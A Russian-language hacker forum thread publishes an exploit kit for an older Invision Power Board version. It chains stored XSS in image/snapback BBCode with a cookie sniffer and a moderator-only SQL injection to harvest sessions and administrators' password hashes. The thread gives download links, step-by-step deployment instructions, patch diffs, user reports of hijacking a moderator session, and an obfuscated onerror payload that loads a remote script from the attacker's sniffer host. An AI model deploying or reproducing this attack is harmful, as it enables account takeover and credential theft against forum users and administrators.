----[ NITRO ... ] Эта уязвимость была найдена с года два назад да и патч к ней уже существует год , форумов с этой версией становится все меньше а это значит что пора опубликовать рабочий эксплоит . Суть его работы состоит в сборе сессий юзеров с помощью активной xss иньекции , размещенной самим юзером , и получении данных с помощью SQL иньекции. Эксплоит состоит из нескольких частей - генератор активной xss , javascript файл , который будет вызван при посещении страницы с xss , просмотрщик логов и компонент , который извлечет данные из MySQL таблицы форума нужные данные в случае если перехваченная сессипринадлежала человеку с правами модератора. ----[ ACTIVE XSS ... ] Скрипт xss.php , входящий в состав пакета , сгенерирует xss для последующего размещения ее в теме . В качестве ссылки следует указать полный путь до файла ya.js ( в котором вы уже предварительно исправили путь на свой ) , скорей всего останется всего лишь нажать на кнопку так как путь уже выставлен програмно . Патч sources/classes/bbcode/class_bbcode_core.php, Function "regex_check_image", line 924: 1. PHP: $default = "[img]".$url."[/img]"; PHP: $default = "[img]".str_replace( '[', '[', $url )."[/img]"; 2. PHP: if ( preg_match( "/[?&;]/", $url) ) PHP: if ( preg_match( "/[?&;\<\[]/", $url) ) sources/classes/bbcode/class_bbcode_core.php, Function "post_db_parse_bbcode", line 486 1. PHP: preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); PHP: preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); if ( $row['bbcode_tag'] == 'snapback' ) { $match[2][$i] = intval( $match[2][$i] ); } ----[ SQL INJECTION ... ] Иньекция осуществима лишь тогда , когда имеется сессия пользователя с доступом в модераторскую панель . Патч.Необходимо привести параметр starter к числовому виду посредством функции intval ----[ SNIFFER ... ] Результат работы эксплоита оформлен в виде простого php cookie сниффера . В случае удачного проведения SQL иньекции будут также представленая полная информация о администраторском составе форума ----[ EOF ... ] Выражаю большую благодарность лицам из закрытых разделов Античата , а также всем кто меня знает и не знает , тем кто дышал и не дышал в этот момент за поддержку . Скорей всего скрипт не работает или работает не так как надо . Вся информация указана выше . Надеюсь скоро линк умрет и тема будет удалена xD www.underwater.itdefence.ru/isniff.rar http://www.milw0rm.com/exploits/4841
Евгений Минаев Большое спасибо только я одного не понял почему ты это не запостил в закреплёной теме ipb удобней же когда все в одном месте .
Хм... Попробовал на локалхосте- XSS действительно работает. Подменил куки - F5 - и я уже модер. Только вот не получается провести инъекцию- как заюзать скрипт exploit.php?
Isis, Фикс в самом сплоите от иньекцию криво делает соль не правельную выводит... я и хотел фикс выставить ток не знал еси эт спецально сделано...
Вот тебе решение без геммороя -------------------------------- Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!
HTML: Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/ Открываем ya.js блокнтом, правим путь до host/path/ya.gif , в данном случае пишем http://localhost/sniff/ya.gif, на файл data.txt выставляем права 666. Затем заходим на xss.php и прописываем полный путь http://localhost/sniff/ya.js и жмем кнопку - попробуй ее не найти она там одна - и получаем код. Нашим юзером заходим на форум, постим это сообщение и ждем когда его прочитают модеры. В случае если ктото с модераторскими - или выше - правами зайдет в нашу тему, скрипт получит хеши и соли всего администраторского состава, все это вы можете посмотреть на view.php www.underwater.itdefence.ru/isniff.rar www.milw0rm.com/sploits/2008-isniff.rar
Сделал пост. Не сработало. Форум изменил код на: <img src="http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif" border="0" alt="Изображение" /> Форум пропатченный? Я правильно понимаю, что нужно искать другую уязвимость? Я новичек.
